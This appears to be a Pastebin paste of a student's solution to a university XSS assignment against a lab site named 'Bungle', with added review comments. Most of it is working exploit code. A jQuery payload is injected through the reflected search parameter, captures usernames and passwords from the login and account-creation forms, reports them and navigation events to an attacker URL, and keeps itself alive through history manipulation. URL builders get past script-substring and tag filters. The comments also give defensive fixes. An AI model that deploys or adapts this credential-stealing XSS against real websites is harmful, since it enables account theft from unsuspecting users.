
AlmostDone

a guest
Nov 30th, 2016
  1. <meta charset="utf-8">
  2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
  3. <script>
  4.  
  // NOTE(review): payload(a) is the script body that makeLink() serializes with
  // payload.toString() and places in the reflected `q` parameter, so every byte of
  // the function text ends up in the generated URL. Its text is therefore left
  // untouched here and all commentary sits outside the function.
  //
  // What the visible code is written to do once it runs inside the target page:
  //   - `a` is the URL passed in by the caller (makeLink passes `attacker`); inner
  //     function b(...) ends in $.get(a, <event object>), i.e. events are reported
  //     to that URL as GET query parameters.
  //   - inner function c() strips the href from #bungle-lnk, #search-again-btn and
  //     every .history-item and replaces it with click handlers that call d(...);
  //     it also hides some .history-item entries and rebinds #search-btn,
  //     #log-in-btn, #log-out-btn and #new-account-btn.
  //   - the #log-in-btn and #new-account-btn handlers read #username and #userpass
  //     and hand both values to b(...) before POSTing them to ./login or ./create.
  //   - inner function d(a, d) reports a "nav" event, then either loads the page
  //     into the current document with $("html").load(...) plus history.pushState,
  //     or restores the HTML saved in history.state. The document is never
  //     reloaded, so the injected handlers stay in place while the address bar
  //     keeps changing.
  //   - on document ready, a new script element holding `var attacker`, `var cu`
  //     and the sources of d, b and c is appended, window.onpopstate is routed to
  //     d(...), and "/" is loaded into the document.
  //
  // Defender takeaways: the entry point is the search page echoing `q` into HTML
  // without encoding; HTML-encoding that value on output closes it. A
  // Content-Security-Policy that disallows inline script and limits where the page
  // may send requests would also stop this pattern. Cookie flags such as HttpOnly
  // do not help here, because the credentials are read from the form fields.
  5. function payload(a){function b(b){console.log($.param(dafta)),$.get(a,b)}function c(){$("html").hide(),$("#bungle-lnk").removeAttr("href"),$("#bungle-lnk").click(function(){d("/","/"!=history.state.url)}),$("#search-again-btn").removeAttr("href"),$("#search-again-btn").click(function(){d("/",!0)}),$(".history-item").each(function(){var a=$(this).attr("href");$(this).removeAttr("href"),$(this).click(function(){d(a,!0)}),$(this).text().includes("cTc2fWp1TFgFj7M6aFBl")?$(this).hide():index%2==0&&$(this).hide()}),$("#search-btn").click(function(a){a.preventDefault();var b=$("#query").val();$.ajax({url:"./search",data:{q:b},type:"GET",success:function(a){$("html").html(a),d("search?q="+b,!0)}})}),$("#log-in-btn").click(function(a){a.preventDefault();var c=$("#username").val(),e=$("#userpass").val();b({event:"login",user:c,pass:e}),console.log("setting cu to "+c),cu=c,$.ajax({url:"./login",data:{username:c,password:e},type:"POST",success:function(a){$("html").html(a),history.replaceState({url:"/",html:$("html").html()},"","/"),d("/",!1)}})}),$("#log-out-btn").click(function(a){a.preventDefault(),b({event:"logout",user:cu}),cu="",$.ajax({url:"./logout",data:{},type:"POST",success:function(a){$("html").html(a),history.replaceState({url:"/",html:$("html").html()},"","/"),d("/",!1)}})}),$("#new-account-btn").click(function(a){a.preventDefault();var c=$("#username").val(),e=$("#userpass").val();b({event:"login",user:c,pass:e}),console.log("setting cu to "+c),cu=c,$.ajax({url:"./create",data:{username:c,password:e},type:"POST",success:function(a){$("html").html(a),history.replaceState({url:"/",html:$("html").html()},"","/"),d("/",!1)}})}),$("html").show()}function d(a,d){var e="http://cos432-assn3.cs.princeton.edu/"+encodeURIComponent(a);b({event:"nav",user:cu,url:e}),d?$("html").load(a,function(){c(),history.pushState({url:a,html:$("html").html()},"",a)}):($("html").html(history.state.html),c())}$("html").hide(),$(document).ready(function(){var 
e=document.createElement("s"+"cript");e.text="var attacker = \""+a+"\";\nvar cu = \"\";\n"+d.toString()+"\n"+b.toString()+"\n"+c.toString(),$("html").append(e),window.onpopstate=function(a){d(a.state.url,!1)},history.replaceState(null,"","/"),$("html").load("/",function(){c(),history.replaceState({url:"/",html:$("html").html()},"","/")})})}
  6.  
  /**
   * Builds the search URL that the page's anchor points at. The `q` parameter
   * carries markup containing the source of `payload` followed by a call to it.
   *
   * Each branch shows which server-side filter shape it is written against, which
   * is the part a defender should read:
   *   - 0: plain script element, i.e. `q` is echoed without any encoding.
   *   - 1: every "script" becomes "sscriptcript"; presumably this level deletes
   *        the substring once and does not re-check the result. Deleting
   *        blocklisted substrings is not a substitute for output encoding.
   *   - 2: an onload attribute instead of a script element; presumably this
   *        level only removes script tags. Tag blocklists miss event-handler
   *        attributes.
   *   - 3: unfinished in this paste; returns a placeholder string.
   * The fix for all levels is the same: HTML-encode `q` where it is written
   * into the response.
   *
   * @param {number} xssdefense - Defense level, compared with loose equality.
   * @param {string} target - Origin of the site, used unencoded as the URL prefix.
   * @param {string} attacker - URL passed as the argument of the embedded call.
   * @returns {string|undefined} The URL, or undefined for any other level.
   */
  function makeLink(xssdefense, target, attacker) {
    var searchPrefix = target + "/search?xssdefense=" + xssdefense.toString() + "&q=";
    var invocation = payload.name + "(\"" + attacker + "\");";
    // The tag names are split across string literals so this inline script never
    // contains a literal closing tag for its own script element.
    var scriptMarkup = "<script" + ">" + payload.toString() + ";" + invocation + "<\/script" + ">";
    var original = searchPrefix + encodeURIComponent(scriptMarkup);

    if (xssdefense == 0) {
      return original;
    }
    if (xssdefense == 1) {
      return original.replace(/script/g, "sscriptcript");
    }
    if (xssdefense == 2) {
      var handlerMarkup = "<body onload='" + payload.toString() + invocation + "'<\/body" + ">";
      return searchPrefix + encodeURIComponent(handlerMarkup);
    }
    if (xssdefense == 3) {
      return "not done yet";
    }
    // Any other level falls through and yields undefined, as before.
  }
  // Page configuration. `target` looks like a course assignment host (TODO confirm)
  // and `attacker` is a loopback address, so this page is set up as a local lab
  // exercise rather than pointing at a remote collector.
  var xssdefense = 2;
  var target = "http://cos432-assn3.cs.princeton.edu";
  var attacker = "http://127.0.0.1:31337/stolen";

  // Once the DOM is ready, replace the placeholder h3 contents with the anchor.
  // The anchor HTML is built by string concatenation around the generated URL.
  $(document).ready(function () {
    var anchorHtml = "<a target=\"run\" href=\"" + makeLink(xssdefense, target, attacker) + "\">Try Bungle!</a>";
    $("h3").html(anchorHtml);
  });
  33. </script>
  34. <h3>parse error</h3>